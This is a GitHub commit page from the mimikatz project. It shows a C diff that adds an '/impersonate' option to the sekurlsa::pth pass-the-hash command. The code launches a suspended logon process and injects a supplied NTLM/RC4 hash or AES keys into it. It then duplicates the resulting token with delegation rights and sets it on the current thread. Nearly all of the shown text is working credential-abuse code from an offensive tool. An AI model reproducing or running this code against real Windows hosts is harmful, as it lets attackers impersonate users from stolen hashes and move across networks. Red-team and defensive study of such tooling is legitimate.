Skip to content

Commit

Permalink
sekurlsa::pth Auto-impersonation (/impersonate)
Browse files Browse the repository at this point in the history
  • Loading branch information
gentilkiwi committed Sep 26, 2015
1 parent 91b3957 commit 76e68a5
Showing 1 changed file with 29 additions and 12 deletions.
41 changes: 29 additions & 12 deletions mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
Original file line number Diff line number Diff line change
Expand Up @@ -807,15 +807,20 @@ NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
SEKURLSA_PTH_DATA data = {&tokenStats.AuthenticationId, NULL, NULL, NULL, FALSE};
PCWCHAR szUser, szDomain, szRun, szNTLM, szAes128, szAes256;
DWORD dwNeededSize;
HANDLE hToken;
HANDLE hToken, hNewToken;
PROCESS_INFORMATION processInfos;
BOOL isImpersonate;

if(kull_m_string_args_byName(argc, argv, L"user", &szUser, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
{
kull_m_string_args_byName(argc, argv, L"run", &szRun, L"cmd.exe");
kprintf(L"user\t: %s\ndomain\t: %s\nprogram\t: %s\n", szUser, szDomain, szRun);
isImpersonate = kull_m_string_args_byName(argc, argv, L"impersonate", NULL, NULL);
#pragma warning(push)
#pragma warning(disable:4996)
kull_m_string_args_byName(argc, argv, L"run", &szRun, isImpersonate ? _wpgmptr : L"cmd.exe");
#pragma warning(pop)
kprintf(L"user\t: %s\ndomain\t: %s\nprogram\t: %s\nimpers.\t: %s\n", szUser, szDomain, szRun, isImpersonate ? L"yes" : L"no");

if(kull_m_string_args_byName(argc, argv, L"aes128", &szAes128, NULL))
{
Expand Down Expand Up @@ -852,15 +857,15 @@ NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
data.NtlmHash = ntlm;
kprintf(L"NTLM\t: "); kull_m_string_wprintf_hex(data.NtlmHash, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
}
else PRINT_ERROR(L"ntlm hash length must be 32 (16 bytes)\n");
else PRINT_ERROR(L"ntlm hash/rc4 key length must be 32 (16 bytes)\n");
}

if(data.NtlmHash || data.Aes128Key || data.Aes256Key)
{
if(kull_m_process_create(KULL_M_PROCESS_CREATE_LOGON, szRun, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, szUser, szDomain, L"", &processInfos, FALSE))
{
kprintf(L" | PID %u\n | TID %u\n",processInfos.dwProcessId, processInfos.dwThreadId);
if(OpenProcessToken(processInfos.hProcess, TOKEN_READ, &hToken))
if(OpenProcessToken(processInfos.hProcess, TOKEN_READ | (isImpersonate ? TOKEN_DUPLICATE : 0), &hToken))
{
if(GetTokenInformation(hToken, TokenStatistics, &tokenStats, sizeof(tokenStats), &dwNeededSize))
{
Expand All @@ -871,23 +876,35 @@ NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
kprintf(L" \\_ kerberos - ");
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_pth, &data);
kprintf(L"\n");

if(data.isReplaceOk)
{
if(isImpersonate)
{
if(DuplicateTokenEx(hToken, TOKEN_QUERY | TOKEN_IMPERSONATE, NULL, SecurityDelegation, TokenImpersonation, &hNewToken))
{
if(SetThreadToken(NULL, hNewToken))
kprintf(L"** Token Impersonation **\n");
else PRINT_ERROR_AUTO(L"SetThreadToken");
CloseHandle(hNewToken);
}
else PRINT_ERROR_AUTO(L"DuplicateTokenEx");
NtTerminateProcess(processInfos.hProcess, STATUS_SUCCESS);
}
else NtResumeProcess(processInfos.hProcess);
}
else NtTerminateProcess(processInfos.hProcess, STATUS_FATAL_APP_EXIT);
}
else PRINT_ERROR_AUTO(L"GetTokenInformation");
CloseHandle(hToken);
}
else PRINT_ERROR_AUTO(L"OpenProcessToken");

if(data.isReplaceOk)
NtResumeProcess(processInfos.hProcess);
else
NtTerminateProcess(processInfos.hProcess, STATUS_FATAL_APP_EXIT);

CloseHandle(processInfos.hThread);
CloseHandle(processInfos.hProcess);
}
else PRINT_ERROR_AUTO(L"CreateProcessWithLogonW");
}
else PRINT_ERROR(L"Missing at least one argument : ntlm OR aes128 OR aes256\n");
else PRINT_ERROR(L"Missing at least one argument : ntlm/rc4 OR aes128 OR aes256\n");
}
else PRINT_ERROR(L"Missing argument : domain\n");
}
Expand Down

0 comments on commit 76e68a5

Please sign in to comment.